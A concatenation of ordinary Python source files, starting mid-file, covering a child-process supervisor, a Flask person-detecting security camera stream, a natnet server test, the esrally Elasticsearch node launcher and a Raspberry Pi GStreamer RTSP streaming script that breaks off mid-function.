self.stderr = '/dev/null'
self.env = {}
self.working_dir = None
self.exit_signal = signal.SIGTERM
self.config(**config)
def config(self, **config):
"""
Configures various options of this child process.
:param config: Various configuration options - these include:
- ``stdin`` is the name of the file to hook up to the child process's
standard input.
- ``stdout`` is the name of the file to hook up the child process's
standard output.
- ``stderr`` is the name of the file to hook up the child process's
standard error.
- ``env`` is the environment to pass to the child process, as a
dictionary.
- ``cwd`` sets the working directory of the child process.
- ``sig`` sets the signal to send when terminating the child process.
"""
for config_name, config_value in config.items():
if config_name == 'stdin':
self.stdin = config_value
elif config_name == 'stdout':
self.stdout = config_value
elif config_name == 'stderr':
self.stderr = config_value
elif config_name == 'env':
self.env = config_value
elif config_name == 'cwd':
self.working_dir = config_value
elif config_name == 'sig':
self.exit_signal = config_value
else:
raise NameError('No configuration option "{}"'.format(
config_name))
def start(self):
"""
Launches the subprocess.
"""
if self.child_pid.get() is not None:
raise ValueError('Child process already running - cannot start another')
# Since we're going to be redirecting stdout/stderr, we need to flush
# these streams to prevent the child's logs from getting polluted
sys.stdout.flush()
sys.stderr.flush()
child_pid = os.fork()
if child_pid == 0:
try:
# Create a new process group, so that we don't end up killing
# ourselves if we kill this child. (For some reason, doing this
# didn't always work when done in the child, so it is done in the
# parent).
os.setsid()
# Put the proper file descriptors in to replace the standard
# streams
stdin = open(self.stdin)
stdout = open(self.stdout, 'a')
stderr = open(self.stderr, 'a')
os.dup2(stdin.fileno(), sys.stdin.fileno())
os.dup2(stdout.fileno(), sys.stdout.fileno())
os.dup2(stderr.fileno(), sys.stderr.fileno())
# (This only closes the original file descriptors, not the
# copied ones, so the files are not lost)
stdin.close()
stdout.close()
stderr.close()
# Update the child's environment with whatever variables were
# given to us.
for key, value in self.env.items():
os.environ[key] = value
# Change the directory to the preferred working directory for the
# child
if self.working_dir is not None:
os.chdir(self.working_dir)
# Run the child - to avoid keeping around an extra process, go
# ahead and pass the command to a subshell, which will replace
# this process
os.execvp('/bin/sh', ['/bin/sh', '-c', self.program])
finally:
# Just in case we fail, we need to avoid exiting this routine.
# os._exit() is used here to avoid the SystemExit exception -
# unittest (stupidly) catches SystemExit, as raised by sys.exit(),
# which we need to avoid.
os._exit(1)
else:
self.child_pid.set(child_pid)
self.event_sock.send(protocol.Event(self.name, protocol.EVENT_STARTJOB))
LOGGER.info('Starting child process')
LOGGER.info('- command = "%s"', self.program)
LOGGER.info('- stdin = %s', self.stdin)
LOGGER.info('- sdout = %s', self.stdout)
LOGGER.info('- stderr = %s', self.stderr)
LOGGER.info('- environment')
for var, value in self.env.items():
LOGGER.info('* "%s" = "%s"', var, value)
LOGGER.info('- working directory = %s',
self.working_dir if self.working_dir is not None
else os.getcwd())
@util.log_crashes(LOGGER, 'Error in child ' + self.name)
def wait_for_subprocess():
# Since waitpid() is synchronous (doing it asynchronously takes
# a good deal more work), the waiting is done in a worker thread
# whose only job is to wait until the child dies, and then to
# notify the parent.
#
# Although Linux pre-2.4 had issues with this (read waitpid(2)),
# this is fully compatible with POSIX.
LOGGER.info('Waiting on "%s"', self.program)
os.waitpid(self.child_pid.get(), 0)
LOGGER.info('"%s" died', self.program)
self.child_pid.set(None)
self.event_sock.send(protocol.Event(self.name, protocol.EVENT_STOPJOB))
# Although it might seem like a waste to spawn a thread for each
# running child, they don't do much work (they basically block for
# their whole existence).
waiter_thread = threading.Thread(target=wait_for_subprocess)
waiter_thread.start()
def kill(self):
"""
Signals the process with whatever signal was configured.
"""
child_pid = self.child_pid.get()
if child_pid is not None:
LOGGER.info('Sending signal %d to "%s"', self.exit_signal, self.program)
# Ensure all descendants of the process, not just the process itself,
# die. This requires killing the process group.
try:
proc_group = os.getpgid(child_pid)
LOGGER.info('Killing process group %d', proc_group)
os.killpg(proc_group, self.exit_signal)
LOGGER.info('Killed process group')
except OSError:
# This happened once during the testing, and means that the
# process has died somehow. Try to go ahead and kill the child
# by PID (since it is possible that, for some reason, setting
# the child's process group ID failed). If *that* fails, then
# just bail.
try:
LOGGER.info('Failed to kill child group of "%s" - falling back on killing the child itself', self.name)
os.kill(child_pid, self.exit_signal)
except OSError:
# So, *somehow*, the process isn't around, even though
# the variable state indicates it is. Obviously, the
# variable state is wrong, and we need to correct that.
LOGGER.info('Inconsistent child PID of "%s" - fixing', self.name)
self.child_pid.set(None)
LOGGER.info('Finished killing %s', self.name)
else:
raise ValueError('Child process not running - cannot kill it')
def get_status(self):
"""
Gets the current state of the process.
:return: ``True`` if running, ``False`` if not running.
"""
# self.child_pid is only set when the process is running, since :meth:`start`
# sets it and the death handler unsets it.
return self.child_pid.get() is not None
def get_pid(self):
"""
Gets the PID of the process.
:return: Either an ``int`` (representing the child's PID) if the
process is running, or ``None`` if it is not.
"""
return self.child_pid.get()
class ChildProcessSkeleton(ChildProcess):
def __init__(self, name, program, **config):
"""
Creates a new :class:`ChildProcessSkeleton`, which is like a
:class:`ChildProcess` but which allows the event queue to be specified
later.
With the exception of the event queue, the parameters are the same as
:meth:`ChildProcess.__init__`.
"""
super().__init__(None, name, program, **config)
def set_event_sock(self, event_sock):
"""
Sets up the event queue, allowing this skeleton to be used.
:param protocol.Protocol* event_sock: The event socket to send start/stop events to.
"""
self.event_sock = event_sock
def start(self):
"""
See :meth`ChildProcess.start`.
This simply wraps that method to raise a :class:`AttributeError` if the
event socket has not been provided.
"""
if self.event_sock is None:
raise AttributeError('ChildProcessSkeleton was not instantiated')
return super().start()
|
main.py
|
import cv2
import sys
from mail import sendEmail
from flask import Flask, render_template, Response
from camera import VideoCamera
from flask_basicauth import BasicAuth
import time
import threading
email_update_interval = 600 # sends an email only once in this time interval
video_camera = VideoCamera(flip=True) # creates a camera object, flip vertically
object_classifier = cv2.CascadeClassifier("models/fullbody_recognition_model.xml") # an opencv classifier
# App Globals (do not edit)
app = Flask(__name__)
app.config['BASIC_AUTH_USERNAME'] = 'CHANGE_ME_USERNAME'
app.config['BASIC_AUTH_PASSWORD'] = 'CHANGE_ME_PLEASE'
app.config['BASIC_AUTH_FORCE'] = True
basic_auth = BasicAuth(app)
last_epoch = 0
def check_for_objects():
global last_epoch
while True:
try:
frame, found_obj = video_camera.get_object(object_classifier)
if found_obj and (time.time() - last_epoch) > email_update_interval:
last_epoch = time.time()
print "Sending email..."
sendEmail(frame)
print "done!"
except:
print "Error sending email: ", sys.exc_info()[0]
@app.route('/')
@basic_auth.required
def index():
return render_template('index.html')
def gen(camera):
while True:
frame = camera.get_frame()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n\r\n')
@app.route('/video_feed')
def video_feed():
return Response(gen(video_camera),
mimetype='multipart/x-mixed-replace; boundary=frame')
if __name__ == '__main__':
t = threading.Thread(target=check_for_objects, args=())
t.daemon = True
t.start()
app.run(host='0.0.0.0', debug=False)
|
test_Server.py
|
# coding: utf-8
"""Integration tests for comms module using Server class."""
import sys
import time
import pytest
import natnet
if sys.platform == 'win32':
# For some reason multiprocessing is letting me pickle lambdas everywhere except on Windows.
# The 'multiprocess' library from pathos uses dill instead of pickle, so happily pickles
# everything, but doesn't have coverage support.
# So, use multiprocess on Windows and multiprocessing elsewhere, and let Codecov sort it out
import multiprocess as multiprocessing
else:
import multiprocessing
class MPServer(natnet.Server):
def __init__(self, started_event, exit_event, *args, **kwargs):
super(MPServer, self).__init__(*args, **kwargs)
self.started_event = started_event # type: multiprocessing.Event
self.exit_event = exit_event # type: multiprocessing.Event
def _run(self, *args, **kwargs):
self.started_event.set()
super(MPServer, self)._run(*args, **kwargs)
def should_exit(self):
return self.exit_event.is_set()
should_exit = property(should_exit, lambda self, e: None)
@pytest.fixture()
def server():
started_event = multiprocessing.Event()
exit_event = multiprocessing.Event()
process = multiprocessing.Process(target=lambda: MPServer(started_event, exit_event).run(rate=1000))
process.start()
started_event.wait() # Starting processes is really slow on Windows
time.sleep(0.1) # Give the server a head start at stdout
yield
exit_event.set()
process.join(timeout=1)
process.terminate()
@pytest.mark.timeout(5)
def test_autodiscovery(server):
c = natnet.Client.connect(timeout=1)
c.run_once()
|
launcher.py
|
# Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import os
import signal
import subprocess
import threading
import shlex
from esrally import config, time, exceptions, client
from esrally.mechanic import telemetry, cluster, java_resolver
from esrally.utils import process, jvm
def wait_for_rest_layer(es, max_attempts=20):
for attempt in range(max_attempts):
import elasticsearch
try:
es.info()
return True
except elasticsearch.TransportError as e:
if e.status_code == 503 or isinstance(e, elasticsearch.ConnectionError):
time.sleep(1)
elif e.status_code == 401:
time.sleep(1)
else:
raise e
return False
class ClusterLauncher:
"""
The cluster launcher performs cluster-wide tasks that need to be done in the startup / shutdown phase.
"""
def __init__(self, cfg, metrics_store, client_factory_class=client.EsClientFactory):
"""
Creates a new ClusterLauncher.
:param cfg: The config object.
:param metrics_store: A metrics store that is configured to receive system metrics.
:param client_factory_class: A factory class that can create an Elasticsearch client.
"""
self.cfg = cfg
self.metrics_store = metrics_store
self.client_factory = client_factory_class
self.logger = logging.getLogger(__name__)
def start(self):
"""
Performs final startup tasks.
Precondition: All cluster nodes have been started.
Postcondition: The cluster is ready to receive HTTP requests or a ``LaunchError`` is raised.
:return: A representation of the launched cluster.
"""
enabled_devices = self.cfg.opts("mechanic", "telemetry.devices")
telemetry_params = self.cfg.opts("mechanic", "telemetry.params")
all_hosts = self.cfg.opts("client", "hosts").all_hosts
default_hosts = self.cfg.opts("client", "hosts").default
preserve = self.cfg.opts("mechanic", "preserve.install")
es = {}
for cluster_name, cluster_hosts in all_hosts.items():
all_client_options = self.cfg.opts("client", "options").all_client_options
cluster_client_options = dict(all_client_options[cluster_name])
# Use retries to avoid aborts on long living connections for telemetry devices
cluster_client_options["retry-on-timeout"] = True
es[cluster_name] = self.client_factory(cluster_hosts, cluster_client_options).create()
es_default = es["default"]
t = telemetry.Telemetry(enabled_devices, devices=[
telemetry.NodeStats(telemetry_params, es, self.metrics_store),
telemetry.ClusterMetaDataInfo(es_default),
telemetry.ClusterEnvironmentInfo(es_default, self.metrics_store),
telemetry.JvmStatsSummary(es_default, self.metrics_store),
telemetry.IndexStats(es_default, self.metrics_store),
telemetry.MlBucketProcessingTime(es_default, self.metrics_store),
telemetry.CcrStats(telemetry_params, es, self.metrics_store),
telemetry.RecoveryStats(telemetry_params, es, self.metrics_store)
])
# The list of nodes will be populated by ClusterMetaDataInfo, so no need to do it here
c = cluster.Cluster(default_hosts, [], t, preserve)
self.logger.info("All cluster nodes have successfully started. Checking if REST API is available.")
if wait_for_rest_layer(es_default, max_attempts=40):
self.logger.info("REST API is available. Attaching telemetry devices to cluster.")
t.attach_to_cluster(c)
self.logger.info("Telemetry devices are now attached to the cluster.")
else:
# Just stop the cluster here and raise. The caller is responsible for terminating individual nodes.
self.logger.error("REST API layer is not yet available. Forcefully terminating cluster.")
self.stop(c)
raise exceptions.LaunchError("Elasticsearch REST API layer is not available. Forcefully terminated cluster.")
return c
def stop(self, c):
"""
Performs cleanup tasks. This method should be called before nodes are shut down.
:param c: The cluster that is about to be stopped.
"""
c.telemetry.detach_from_cluster(c)
class StartupWatcher:
def __init__(self, node_name, server, startup_event):
self.node_name = node_name
self.server = server
self.startup_event = startup_event
self.logger = logging.getLogger(__name__)
def watch(self):
"""
Reads the output from the ES (node) subprocess.
"""
lines_to_log = 0
while True:
line = self.server.stdout.readline().decode("utf-8")
if len(line) == 0:
self.logger.info("%s (stdout): No more output. Process has likely terminated.", self.node_name)
self.await_termination(self.server)
self.startup_event.set()
break
line = line.rstrip()
# if an error occurs, log the next few lines
if "error" in line.lower():
lines_to_log = 10
# don't log each output line as it is contained in the node's log files anyway and we just risk spamming our own log.
if not self.startup_event.isSet() or lines_to_log > 0:
self.logger.info("%s (stdout): %s", self.node_name, line)
lines_to_log -= 1
# no need to check as soon as we have detected node startup
if not self.startup_event.isSet():
if line.find("Initialization Failed") != -1 or line.find("A fatal exception has occurred") != -1:
self.logger.error("[%s] encountered initialization errors.", self.node_name)
# wait a moment to ensure the process has terminated before we signal that we detected a (failed) startup.
self.await_termination(self.server)
self.startup_event.set()
if line.endswith("started") and not self.startup_event.isSet():
self.startup_event.set()
self.logger.info("[%s] has successfully started.", self.node_name)
def await_termination(self, server, timeout=5):
# wait a moment to ensure the process has terminated
wait = timeout
while not server.returncode or wait == 0:
time.sleep(0.1)
server.poll()
wait -= 1
def _start(process, node_name):
log = logging.getLogger(__name__)
startup_event = threading.Event()
watcher = StartupWatcher(node_name, process, startup_event)
t = threading.Thread(target=watcher.watch)
t.setDaemon(True)
t.start()
if startup_event.wait(timeout=InProcessLauncher.PROCESS_WAIT_TIMEOUT_SECONDS):
process.poll()
# has the process terminated?
if process.returncode:
msg = "Node [%s] has terminated with exit code [%s]." % (node_name, str(process.returncode))
log.error(msg)
raise exceptions.LaunchError(msg)
else:
log.info("Started node [%s] with PID [%s].", node_name, process.pid)
return process
else:
msg = "Could not start node [%s] within timeout period of [%s] seconds." % (
node_name, InProcessLauncher.PROCESS_WAIT_TIMEOUT_SECONDS)
# check if the process has terminated already
process.poll()
if process.returncode:
msg += " The process has already terminated with exit code [%s]." % str(process.returncode)
else:
msg += " The process seems to be still running with PID [%s]." % process.pid
log.error(msg)
raise exceptions.LaunchError(msg)
class DockerLauncher:
# May download a Docker image and that can take some time
PROCESS_WAIT_TIMEOUT_SECONDS = 10 * 60
def __init__(self, cfg, metrics_store):
self.cfg = cfg
self.metrics_store = metrics_store
self.binary_paths = {}
self.node_name = None
self.keep_running = self.cfg.opts("mechanic", "keep.running")
self.logger = logging.getLogger(__name__)
def start(self, node_configurations):
nodes = []
for node_configuration in node_configurations:
node_name = node_configuration.node_name
host_name = node_configuration.ip
binary_path = node_configuration.binary_path
self.binary_paths[node_name] = binary_path
p = self._start_process(cmd="docker-compose -f %s up" % binary_path, node_name=node_name)
# only support a subset of telemetry for Docker hosts (specifically, we do not allow users to enable any devices)
node_telemetry = [
telemetry.DiskIo(self.metrics_store, len(node_configurations)),
telemetry.CpuUsage(self.metrics_store),
telemetry.NodeEnvironmentInfo(self.metrics_store)
]
t = telemetry.Telemetry(devices=node_telemetry)
nodes.append(cluster.Node(p, host_name, node_name, t))
return nodes
def _start_process(self, cmd, node_name):
return _start(subprocess.Popen(shlex.split(cmd),
stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.DEVNULL), node_name)
def stop(self, nodes):
if self.keep_running:
self.logger.info("Keeping Docker container running.")
else:
self.logger.info("Stopping Docker container")
for node in nodes:
node.telemetry.detach_from_node(node, running=True)
process.run_subprocess_with_logging("docker-compose -f %s down" % self.binary_paths[node.node_name])
node.telemetry.detach_from_node(node, running=False)
class ExternalLauncher:
def __init__(self, cfg, metrics_store, client_factory_class=client.EsClientFactory):
self.cfg = cfg
self.metrics_store = metrics_store
self.client_factory = client_factory_class
self.logger = logging.getLogger(__name__)
def start(self, node_configurations=None):
hosts = self.cfg.opts("client", "hosts").default
client_options = self.cfg.opts("client", "options").default
es = self.client_factory(hosts, client_options).create()
# cannot enable custom telemetry devices here
t = telemetry.Telemetry(devices=[
# This is needed to actually populate the nodes
telemetry.ClusterMetaDataInfo(es),
# will gather node specific meta-data for all nodes
telemetry.ExternalEnvironmentInfo(es, self.metrics_store),
])
# We create a pseudo-cluster here to get information about all nodes.
# cluster nodes will be populated by the external environment info telemetry device. We cannot know this upfront.
c = cluster.Cluster(hosts, [], t)
user_defined_version = self.cfg.opts("mechanic", "distribution.version", mandatory=False)
distribution_version = es.info()["version"]["number"]
if not user_defined_version or user_defined_version.strip() == "":
self.logger.info("Distribution version was not specified by user. Rally-determined version is [%s]", distribution_version)
self.cfg.add(config.Scope.benchmark, "mechanic", "distribution.version", distribution_version)
elif user_defined_version != distribution_version:
self.logger.warning("Distribution version '%s' on command line differs from actual cluster version '%s'.",
user_defined_version, distribution_version)
t.attach_to_cluster(c)
return c.nodes
def stop(self, nodes):
# nothing to do here, externally provisioned clusters / nodes don't have any specific telemetry devices attached.
pass
class InProcessLauncher:
"""
Launcher is responsible for starting and stopping the benchmark candidate.
"""
PROCESS_WAIT_TIMEOUT_SECONDS = 90.0
def __init__(self, cfg, metrics_store, races_root_dir, clock=time.Clock):
self.cfg = cfg
self.metrics_store = metrics_store
self._clock = clock
self.races_root_dir = races_root_dir
self.keep_running = self.cfg.opts("mechanic", "keep.running")
self.logger = logging.getLogger(__name__)
def start(self, node_configurations):
# we're very specific which nodes we kill as there is potentially also an Elasticsearch based metrics store running on this machine
# The only specific trait of a Rally-related process is that is started "somewhere" in the races root directory.
#
# We also do this only once per host otherwise we would kill instances that we've just launched.
process.kill_running_es_instances(self.races_root_dir)
node_count_on_host = len(node_configurations)
return [self._start_node(node_configuration, node_count_on_host) for node_configuration in node_configurations]
def _start_node(self, node_configuration, node_count_on_host):
host_name = node_configuration.ip
node_name = node_configuration.node_name
car = node_configuration.car
binary_path = node_configuration.binary_path
data_paths = node_configuration.data_paths
node_telemetry_dir = "%s/telemetry" % node_configuration.node_root_path
java_major_version, java_home = java_resolver.java_home(car, self.cfg)
self.logger.info("Starting node [%s] based on car [%s].", node_name, car)
enabled_devices = self.cfg.opts("mechanic", "telemetry.devices")
telemetry_params = self.cfg.opts("mechanic", "telemetry.params")
node_telemetry = [
telemetry.FlightRecorder(telemetry_params, node_telemetry_dir, java_major_version),
telemetry.JitCompiler(node_telemetry_dir),
telemetry.Gc(node_telemetry_dir, java_major_version),
telemetry.PerfStat(node_telemetry_dir),
telemetry.DiskIo(self.metrics_store, node_count_on_host),
telemetry.CpuUsage(self.metrics_store),
telemetry.NodeEnvironmentInfo(self.metrics_store),
telemetry.IndexSize(data_paths, self.metrics_store),
telemetry.MergeParts(self.metrics_store, node_configuration.log_path),
telemetry.StartupTime(self.metrics_store),
]
t = telemetry.Telemetry(enabled_devices, devices=node_telemetry)
env = self._prepare_env(car, node_name, java_home, t)
t.on_pre_node_start(node_name)
node_process = self._start_process(env, node_name, binary_path)
node = cluster.Node(node_process, host_name, node_name, t)
self.logger.info("Attaching telemetry devices to node [%s].", node_name)
t.attach_to_node(node)
return node
def _prepare_env(self, car, node_name, java_home, t):
env = {}
env.update(os.environ)
env.update(car.env)
self._set_env(env, "PATH", os.path.join(java_home, "bin"), separator=os.pathsep)
# Don't merge here!
env["JAVA_HOME"] = java_home
# we just blindly trust telemetry here...
for k, v in t.instrument_candidate_env(car, node_name).items():
self._set_env(env, k, v)
exit_on_oome_flag = "-XX:+ExitOnOutOfMemoryError"
if jvm.supports_option(java_home, exit_on_oome_flag):
self.logger.info("Setting [%s] to detect out of memory errors during the benchmark.", exit_on_oome_flag)
self._set_env(env, "ES_JAVA_OPTS", exit_on_oome_flag)
else:
self.logger.info("JVM does not support [%s]. A JDK upgrade is recommended.", exit_on_oome_flag)
self.logger.debug("env for [%s]: %s", node_name, str(env))
return env
def _set_env(self, env, k, v, separator=' '):
if v is not None:
if k not in env:
env[k] = v
else: # merge
env[k] = v + separator + env[k]
def _start_process(self, env, node_name, binary_path):
if os.geteuid() == 0:
raise exceptions.LaunchError("Cannot launch Elasticsearch as root. Please run Rally as a non-root user.")
os.chdir(binary_path)
cmd = ["bin/elasticsearch"]
return _start(subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.DEVNULL, env=env), node_name)
def stop(self, nodes):
if self.keep_running:
self.logger.info("Keeping [%d] nodes on this host running.", len(nodes))
else:
self.logger.info("Shutting down [%d] nodes on this host.", len(nodes))
for node in nodes:
process = node.process
node_name = node.node_name
node.telemetry.detach_from_node(node, running=True)
if not self.keep_running:
stop_watch = self._clock.stop_watch()
stop_watch.start()
try:
os.kill(process.pid, signal.SIGINT)
process.wait(10.0)
self.logger.info("Done shutdown node [%s] in [%.1f] s.", node_name, stop_watch.split_time())
except ProcessLookupError:
self.logger.warning("No process found with PID [%s] for node [%s]", process.pid, node_name)
except subprocess.TimeoutExpired:
# kill -9
self.logger.warning("Node [%s] did not shut down after 10 seconds; now kill -QUIT node, to see threads:", node_name)
try:
os.kill(process.pid, signal.SIGQUIT)
except OSError:
self.logger.warning("No process found with PID [%s] for node [%s]", process.pid, node_name)
break
try:
process.wait(120.0)
self.logger.info("Done shutdown node [%s] in [%.1f] s.", node_name, stop_watch.split_time())
break
except subprocess.TimeoutExpired:
pass
self.logger.info("kill -KILL node [%s]", node_name)
try:
process.kill()
except ProcessLookupError:
self.logger.warning("No process found with PID [%s] for node [%s]", process.pid, node_name)
node.telemetry.detach_from_node(node, running=False)
|
gst-rtsp-launch.py
|
#!/usr/bin/python
# --------------------------------------------------------------------------- #
# Supporting arguments
# --------------------------------------------------------------------------- #
import argparse
parser = argparse.ArgumentParser(description="gst-rtsp-launch-py V0.1")
parser.add_argument('-v', '--verbose', action='store_true', help='Make script chatty')
parser.add_argument('-f', '--file', action='store', default="v4l2ctl.json", help='Video Configuration file')
parser.add_argument('-d', '--device', action='store', default="picam", help='Video Device Path')
parser.add_argument('-P', '--rtspport', action='store', default=554, help='Set RTSP port')
parser.add_argument('-u', '--rtspname', action='store', default="live", help='Set RTSP name')
parser.add_argument('-W', '--rtspresolutionwidth', action='store', default=1280, help='Set RTSP resolution width')
parser.add_argument('-H', '--rtspresolutionheight', action='store', default=720, help='Set RTSP resolution height')
parser.add_argument('-M', '--mjpeg', action='store_true', help='Start with MJPEG codec')
args = parser.parse_args()
# --------------------------------------------------------------------------- #
# configure the service logging
# --------------------------------------------------------------------------- #
import logging
logging.basicConfig()
log = logging.getLogger()
# --------------------------------------------------------------------------- #
# import misc standard libraries
# --------------------------------------------------------------------------- #
import json
import time
import os.path
import subprocess
import signal
import sys
from ctypes import *
if args.verbose:
log.setLevel(logging.DEBUG)
else:
log.setLevel(logging.INFO)
# --------------------------------------------------------------------------- #
# Use gi to import GStreamer functionality
# --------------------------------------------------------------------------- #
import gi
gi.require_version('Gst','1.0')
gi.require_version('GstRtspServer','1.0')
gi.require_version('GstVideo','1.0')
from gi.repository import GObject, Gst, Gio, GstVideo, GstRtspServer, GLib
from threading import Thread, Lock
cam_mutex = Lock()
# -------------------
class StreamServer:
def __init__(self, device, file, port, name, width, height, codec):
signal.signal(signal.SIGTERM, self.exit_gracefully)
Gst.init(None)
self.mainloop = GObject.MainLoop()
self.server = GstRtspServer.RTSPServer()
self.mounts = self.server.get_mount_points()
self.device = device
self.file = file
self.port = port
self.name = name
self.factory = GstRtspServer.RTSPMediaFactory()
# Factory must be shared to allow multiple connections
self.factory.set_shared(True)
self.context_id = 0
self.running = False
self.stayAwake = True
GObject.threads_init()
log.info("StreamServer initialized")
self.codec_options = {0:"h264", 1:"MJPEG"}
self.codec = codec
# Declaring stream settings and initialize with safe default values
self.bitrate_range = [200000, 20000000]
self.bitrate = 5000000
# dynamic range compression
self.drc_options = {0:"off", 1:"low", 2:"medium", 3:"high"}
self.drc = 3
# key frame control (autmoatic = -1)
self.h264_i_frame_period_range = [-1, 60]
self.h264_i_frame_period = 15
# Shutter speed
# 0: Automatic (default)
# 1 to 10000000: Fixed shutter speed in microseconds
self.shutter_range = [0, 10000001]
self.shutter = 0
# ISO level
# 0: Automatic (default)
# 100 to 3200: Fixed ISO mode
self.iso_options = {0:"auto", 100:"ISO 100", 200:"ISO 200", 400:"ISO 400", 800:"ISO 800"}
self.iso = 0
##################################################################################################################################################################
# Sharpness
# 0 to 100: Tweak sharpness filter (default=0)
self.sharpness_range = [0, 100]
self.sharpness = 0
##################################################################################################################################################################
# Birghtness
# 0 to 100: Tweak brightness (default=50)
self.brightness_range = [0, 100]
self.brightness = 50
##################################################################################################################################################################
# Saturation
# 0 to 100: Tweak saturation (default=0)
self.saturation_range = [0, 100]
self.saturation = 0
##################################################################################################################################################################
# Contrast
# 0 to 100: Tweak contrast (default=0 for video stream)
self.contrast_range = [0, 100]
self.contrast = 0
##################################################################################################################################################################
# Frames per second
# 15 to 90: >30fps only available at 640x480
self.fps = 30
self.fps_range = [15, 90]
self.horizontal_mirroring = False
self.vertical_mirroring = False
self.video_stabilisation = False
# White balance
# 000: Off
# 001: Automatic (default)
# 002: sunlight
# 003: Cloudy
# 004: Shade
# 005: Tungsten bulp
# 006: Fluorescent
# 007: Incandescent
# 008: Xenon flash
# 009: Horizon
self.white_balance_options = {0:"Off", 1:"auto", 2:"sunlight", 3:"cloudy", 4:"shade", 5:"tungsten", 6:"flourescent", 7:"incandescent", 8:"xenon", 9:"horizon"}
self.white_balance = 1
# RGB channels might be controlled individually, if white balance mode is "Off"
self.gain_red_range = [0.0, 8.0]
self.gain_red = 1.0
self.gain_green_range = [0.0, 8.0]
self.gain_green = 1.0
self.gain_blue_range = [0.0, 8.0]
self.gain_blue = 1.0
self.width_options = {0:640, 1:800, 2:1024, 3:1280, 4:1640, 5:1920}
self.width = width
self.height_options = {0:480, 1:600, 2:720, 3:768, 4:1024, 5:1232, 6:1080}
self.height = height
self.rotation = 0
self.configDate = 0
def exit_gracefully(self, signum, frame):
self.stop()
self.stayAwake = False
def check_range(self, value, value_range):
return value >= value_range[0] and value <= value_range[1]
def check_option(self, option, options):
return options.has_key(option)
def readConfig(self):
try:
with open(self.file, 'r') as file:
# Filter out special characters that break the json parser
filter = ''.join(e for e in file.read() \
if e.isalnum() \
or e.isdigit() \
or e.isspace() \
or e == '"' or e == ':' or e == '.' or e == ',' \
or e == '#' or e == '(' or e == ')' or e == '{' \
or e == '}' or e == '[' or e == ']' \
or e == '-' or e == '_')
config = json.loads(filter)
log.info("Video settings loaded from "+str(self.file))
self.configDate = os.stat(self.file).st_mtime
if self.check_range(config["CodecControls"]["video_bitrate"], self.bitrate_range):
self.bitrate = config["CodecControls"]["video_bitrate"]
else:
log.error("bitrate out of range: " + str(config["CodecControls"]["video_bitrate"]))
if self.check_range(config["CodecControls"]["h264_i_frame_period"], self.h264_i_frame_period_range):
self.h264_i_frame_period = config["CodecControls"]["h264_i_frame_period"]
else:
log.error("i-frame period invalid: " + str(config["CodecControls"]["h264_i_frame_period"]))
if self.check_range(config["UserControls"]["brightness"], self.brightness_range):
self.brightness = config["UserControls"]["brightness"]
else:
log.error("brightness out of range: " + str(config["UserControls"]["brightness"]))
if self.check_range(config["UserControls"]["contrast"], self.contrast_range):
self.contrast = config["UserControls"]["contrast"]
else:
log.error("contrast out of range: " + str(config["UserControls"]["contrast"]))
if self.check_range(config["UserControls"]["saturation"], self.saturation_range):
self.saturation = config["UserControls"]["saturation"]
else:
log.error("saturation out of range: " + str(config["UserControls"]["saturation"]))
if self.check_range(config["UserControls"]["sharpness"], self.sharpness_range):
self.sharpness = config["UserControls"]["sharpness"]
else:
log.error("sharpness out of range: " + str(config["UserControls"]["sharpness"]))
if self.check_range(config["UserControls"]["red_balance"] / 1000.0, self.gain_red_range):
self.gain_red = config["UserControls"]["red_balance"] / 1000.0
else:
log.error("red balance out of range: " + str(config["UserControls"]["red_balance"] / 1000.0))
if self.check_range(config["UserControls"]["blue_balance"] / 1000.0, self.gain_blue_range):
self.gain_blue = config["UserControls"]["blue_balance"] / 1000.0
else:
log.error("blue balance out of range: " + str(config["UserControls"]["blue_balance"] / 1000.0))
self.horizontal_mirroring = config["UserControls"]["horizontal_flip"]
self.vertical_mirroring = config["UserControls"]["vertical_flip"]
self.rotation = config["UserControls"]["rotate"]
if config["CameraControls"]["auto_exposure"] == False and self.check_range(config["CameraControls"]["exposure_time_absolute"], self.saturation_range):
self.shutter = config["CameraControls"]["exposure_time_absolute"]
else:
self.shutter = 0
if self.check_option(config["CameraControls"]["white_balance_auto_preset"], self.white_balance_options):
self.white_balance = config["CameraControls"]["white_balance_auto_preset"]
else:
log.error("Invalid AWB preset: "+str(config["CameraControls"]["white_balance_auto_preset"]))
self.white_balance = 1
if self.check_option(config["CameraControls"]["iso_sensitivity"], self.iso_options):
self.iso = config["CameraControls"]["iso_sensitivity"]
else:
log.error("invalid ISO option: " + str(config["CameraControls"]["iso_sensitivity"]))
self.iso = 0
self.video_stabilisation = config["CameraControls"]["image_stabilization"]
# These settings will be ignored:
self.bitrate_mode = config["CodecControls"]["video_bitrate_mode"]
self.repeat_sequence_header = config["CodecControls"]["repeat_sequence_header"]
self.h264_level = config["CodecControls"]["h264_level"]
self.h264_profile = config["CodecControls"]["h264_profile"]
except Exception, e:
print ("Unable to read config!")
print str(e)
def launch(self):
log.debug("StreamServer.launch")
if self.running:
log.debug("StreamServer.launch called on running instance.")
self.stop() # Need to stop any instances first
if self.device == "picam":
launch_str = '( rpicamsrc preview=false bitrate='+str(self.bitrate)+' keyframe-interval='+str(self.h264_i_frame_period)+' drc='+str(self.drc)+ \
' image-effect=denoise shutter-speed='+str(self.shutter)+' iso='+str(self.iso)+ \
' brightness='+str(self.brightness)+' contrast='+str(self.contrast)+' saturation='+str(self.saturation)+ \
' sharpness='+str(self.sharpness)+' awb-mode='+str(self.white_balance)+ ' rotation='+str(self.rotation) + \
' hflip='+str(self.horizontal_mirroring)+' vflip='+str(self.vertical_mirroring) + ' video-stabilisation='+str(self.video_stabilisation)
if self.white_balance == 0:
log.info("Using custom white balance settings")
launch_str = launch_str + 'awb-gain-red='+self.gain_red
launch_str = launch_str + 'awb-gain-green='+self.gain_green
